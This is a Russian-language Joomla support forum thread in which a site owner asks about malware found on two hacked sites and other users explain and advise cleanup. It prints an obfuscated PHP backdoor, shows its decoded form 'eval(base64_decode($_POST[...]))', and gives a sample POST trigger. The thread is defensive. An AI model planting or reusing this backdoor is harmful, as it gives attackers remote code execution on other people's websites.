0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 506 Просмотров
*

stydent

  • Осваиваюсь на форуме
  • 140
  • 0
Что за вирус
« : 03.12.2015, 12:05:22 »
уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.
*

kik84

  • Живу я здесь
  • 1278
  • 59
Re: Что за вирус
« Ответ #1 : 03.12.2015, 14:33:41 »
Я бы задался вопросом, не "что за вирус", а как он попадает на сайт.
Удалить варез и неиспользуемые расширения, сканер aibolit по серваку, поставить rsfirewall, не держать пачку сайтов в одном аккаунте, проверить свой комп и т.п.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Что за вирус
« Ответ #2 : 03.12.2015, 16:03:59 »
уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.
Бональный бегдор:
Цитировать
if (isset ($_POST['n052e33']) ) { eval (base64_decode($_POST['n052e33'])) ;}
при обращение к файлу POST запросам приводит к выполнению произвольного кода
POST: n052e33=cGhwaW5mbygpOw==
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

wishlight

  • Профи
  • 3634
  • 223
  • skype aqaus.com
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Что за вирус
« Ответ #4 : 03.12.2015, 17:20:22 »
Согласна с kik84, но даже если удалить варезное, вирус будет сидеть, пока не вычистишь полностью, потому что, он добавляет файлы, скрипты и прочую хрень.

wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет, смысл вашего сообщения? "Чистите!" что ему чистить? ТС даже не знает что это за вирус.

Такое ощущение, что только с баблом сюда надо приходить, за каждым советом. Изначально форум поддержки вроде бы был.
« Последнее редактирование: 03.12.2015, 17:25:53 от 12mv »
*

stydent

  • Осваиваюсь на форуме
  • 140
  • 0
Re: Что за вирус
« Ответ #5 : 03.12.2015, 17:23:56 »
Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?
2. Удалить варез - это что?
*

12mv

  • Завсегдатай
  • 526
  • 20
  • Гульсина
Re: Что за вирус
« Ответ #6 : 03.12.2015, 17:27:36 »
Мне нужны пояснения:
2. Удалить варез - это что?

Удалить те приложения, модули, которые вы скачали со сторонних ресурсов а не у разработчика купили. То же самое касается и шаблона.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Что за вирус
« Ответ #7 : 03.12.2015, 17:50:23 »
Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?
Это значит на каждый сайт сделать отдельного юзера, который будет иметь свою отдельную группу привилегий, в результате чего, пользователь с другой группы привилегий не будет иметь доступа к управлению файлами, но и тут есть подводные камни, по мимо создания отдельных пользователей под каждый сайт, нужно еще и сам сервак безопасно настроить, а для этого вам нужен свой сервак, а не шаред хостинг, ну или если совсем бюджетный вариант, то на шаред хостинге под каждый сайт отдельный договор(аккаунт).
В таком случае если не уследили за одним сайтом, другие сайты не пострадают, ну или снизится риск значительно...

Сайты разделите по пользователям. А потом чистите. Иначе расползется по всем.
Тут поспорю, все зависит от вашей опытности и мастерства, и какой порядок действий вы выбераите.
« Последнее редактирование: 03.12.2015, 17:58:11 от winstrool »
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

wishlight

  • Профи
  • 3634
  • 223
  • skype aqaus.com
Re: Что за вирус
« Ответ #8 : 03.12.2015, 18:53:46 »
опытности и мастерства

Да, это так. Сейчас есть хостинги, которые хотя бы ограничивают выполнение скрипта директорией домена.

wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет

Раньше пользователи рассказывали, сколько сайтов, что стоит, чем пользовались при доступе к сайту, кто имеет доступ к сайту. А мой совет думаю был бы полезен в том плане что "уже второй сайт".

А после того, как сайты изолируются, смотрим на каждом расширения и сверяемся с к примеру https://vel.joomla.org/ или можно поставить Securitycheck, у них список тоже базовых уязвимостей в компоненте. Устраняем их и чистим сайт. Для новичков идеально подходит скрипт ai-bolit.

В данном случае скорее всего на каком-то сайте была уязвимость до обновления (или есть) и через нее залит шелл, и с него все лезет.

Rsfirewall еще купить надо. ТС не сообщал, что он пользовался варезом.
*

stydent

  • Осваиваюсь на форуме
  • 140
  • 0
Re: Что за вирус
« Ответ #9 : 03.12.2015, 22:54:47 »
Сайты на разных площадках. Но оба на timeweb. На хостинге beget не было случаев подобного заражения.

Варез....т.е. все что бесплатное может легко быть взломано?
Обычно пользуюсь известными компонентами и модулями: virtualmat, BT Content Slider

пока спасает запрет на выполнения php в директориях. по логам видно что хакер 403 ответ получает когда запускает свой вирус.
*

wishlight

  • Профи
  • 3634
  • 223
  • skype aqaus.com
Re: Что за вирус
« Ответ #10 : 03.12.2015, 23:01:17 »
Варез - это все программное обеспечение, скачанное не с сайтов авторов или других официальных репозиториев. В результате может содержать пиратский вредоносный код.

У вас наверно такого нет. Это для общей информации.

Сайты обновлены? Хороший хостинг ukraine.com.ua если знать как им пользоваться. У  таймвеба в плане помощи в таких случаях никак.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

опять вирус \?

Автор mami_

Ответов: 15
Просмотров: 171
Последний ответ 07.09.2017, 06:20:29
от voland
Вирус, который виден только в кэше поисковых систем

Автор silavoli

Ответов: 12
Просмотров: 1167
Последний ответ 19.07.2017, 09:57:20
от flyingspook
Поймали вирус trojan.inject.21 как лечить

Автор nick2202

Ответов: 3
Просмотров: 397
Последний ответ 14.07.2017, 17:31:00
от voland
Вирус в виде рекламы на сайте

Автор yasna

Ответов: 10
Просмотров: 304
Последний ответ 08.06.2017, 18:38:43
от winstrool
Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 790
Просмотров: 219298
Последний ответ 23.05.2017, 23:22:56
от AlekVolsk